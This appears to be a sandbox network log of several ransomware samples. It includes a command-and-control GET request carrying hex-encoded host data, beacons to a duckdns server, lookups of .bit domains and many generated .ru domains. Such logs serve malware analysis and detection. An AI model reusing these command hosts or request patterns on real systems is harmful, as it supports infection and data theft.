Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

2.6kB
2.0kB
8
5

HTTP Request

GET http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e6038363f753e233e603834353334282f753e233e60282d3838753e233e600c36320b292d081e753e233e600c36321a2b08292d753e233e600c36320b292d081e753e233e6038363f753e233e603834353334282f753e233e602c323532352f753e233e603528373434302e2b753e233e603834353334282f753e233e

HTTP Response

403
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

144 B
44 B
3
1
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
212.73.150.132:9988

svcc.exe

152 B
3
92.63.197.60:80

winsvcs.exe

152 B
3
23.192.22.89:443

learn.microsoft.com

tls

IEXPLORE.EXE

756 B
4.3kB
10
10
23.192.22.89:443

learn.microsoft.com

tls

IEXPLORE.EXE

704 B
4.2kB
9
9
23.192.22.89:443

learn.microsoft.com

tls

IEXPLORE.EXE

742 B
4.3kB
9
10
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
185.84.108.232:80

brb.3dtuts.by

http

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

82.1kB
1.5kB
62
29
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
212.73.150.132:5555

svcc.exe

152 B
3
92.63.197.112:80

winsvcs.exe

152 B
3
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

144 B
44 B
3
1
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
132.226.247.73:80

http://checkip.dyndns.org/

http

252 B
454 B
4
3

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
92.63.197.112:80

winsvcs.exe

152 B
3
185.84.108.232:80

brb.3dtuts.by

http

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

198.7kB
3.0kB
146
67

8.8.8.8:53

brb.3dtuts.by

dns

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

59 B
75 B
1
1

DNS Request

brb.3dtuts.by

DNS Response

185.84.108.232
8.8.8.8:53

ipv4bot.whatismyipaddress.com

dns

HEUR-Trojan-Ransom.Win32.GandCrypt.gen-3cdd857e90e3d210c991232d4c9de9339a7f2fa941aac7c7d27dc321b4e968ca.exe

75 B
134 B
1
1

DNS Request

ipv4bot.whatismyipaddress.com
8.8.8.8:53

ns1.wowservers.ru

dns

63 B
95 B
1
1

DNS Request

ns1.wowservers.ru

DNS Response

104.155.138.21

107.178.223.183
104.155.138.21:53

ns1.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns1.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns1.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
8.8.8.8:53

ns2.wowservers.ru

dns

63 B
95 B
1
1

DNS Request

ns2.wowservers.ru

DNS Response

107.178.223.183

104.155.138.21
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
8.8.8.8:53

u.lewd.se

dns

HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe

55 B
125 B
1
1

DNS Request

u.lewd.se
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
8.8.8.8:53

paste.is

dns

HEUR-Trojan-Ransom.Win32.Generic-29d77cf18daae8e6304c61f9c2dfd22ba124576b99e190aa39552225fabf496a.exe

54 B
54 B
1
1

DNS Request

paste.is
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
8.8.8.8:53

hicham9risa.duckdns.org

dns

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

69 B
85 B
1
1

DNS Request

hicham9risa.duckdns.org

DNS Response

192.169.69.25
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
8.8.8.8:53

r.driftinhishouse.com

dns

rundll32.exe

67 B
140 B
1
1

DNS Request

r.driftinhishouse.com
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
8.8.8.8:53

learn.microsoft.com

dns

IEXPLORE.EXE

65 B
270 B
1
1

DNS Request

learn.microsoft.com

DNS Response

23.192.22.89
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
107.178.223.183:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
8.8.8.8:53

hicham9risa.duckdns.org

dns

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

69 B
85 B
1
1

DNS Request

hicham9risa.duckdns.org

DNS Response

192.169.69.25
107.178.223.183:53

ns2.wowservers.ru

dns

74 B
1

DNS Request

183.223.178.107.in-addr.arpa
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
107.178.223.183:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
8.8.8.8:53

checkip.dyndns.org

dns

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

132.226.247.73

193.122.130.0

132.226.8.169

158.101.44.242

193.122.6.168
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

60 B
1

DNS Request

ransomware.bit
104.155.138.21:53

ns2.wowservers.ru

dns

73 B
1

DNS Request

21.138.155.104.in-addr.arpa
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
104.155.138.21:53

ns2.wowservers.ru

dns

56 B
1

DNS Request

carder.bit
8.8.8.8:53

rosugoshurgurhus.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

rosugoshurgurhus.ru
8.8.8.8:53

gsisirfjjdissofj.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

gsisirfjjdissofj.ru
8.8.8.8:53

rgouusrsuoonenue.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

rgouusrsuoonenue.ru
8.8.8.8:53

euignjsosjfhgidi.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

euignjsosjfhgidi.ru
8.8.8.8:53

oegoafaueoueuueu.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

oegoafaueoueuueu.ru
8.8.8.8:53

eueininiavaeiiae.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

eueininiavaeiiae.ru
8.8.8.8:53

nfaiiaeiinbbivii.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

nfaiiaeiinbbivii.ru
8.8.8.8:53

pppsooodlldliifi.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

pppsooodlldliifi.ru
8.8.8.8:53

aigiaeuiuueueuer.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

aigiaeuiuueueuer.ru
8.8.8.8:53

cnnaiisdiififiur.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

cnnaiisdiififiur.ru
8.8.8.8:53

eeiieieiifigigid.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

eeiieieiifigigid.ru
8.8.8.8:53

ruuiooototoroidj.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

ruuiooototoroidj.ru
8.8.8.8:53

ddissisifigifidi.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

ddissisifigifidi.ru
8.8.8.8:53

cicicicciicciiis.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

cicicicciicciiis.ru
8.8.8.8:53

ssorgurufsogusru.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

ssorgurufsogusru.ru
8.8.8.8:53

eoppgjrsokoedosh.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

eoppgjrsokoedosh.ru
8.8.8.8:53

geoaueoafugaeije.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

geoaueoafugaeije.ru
8.8.8.8:53

nnvmmsiisirurutt.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

nnvmmsiisirurutt.ru
8.8.8.8:53

auueieieiiighisf.ru

dns

winsvcs.exe

65 B
126 B
1
1

DNS Request

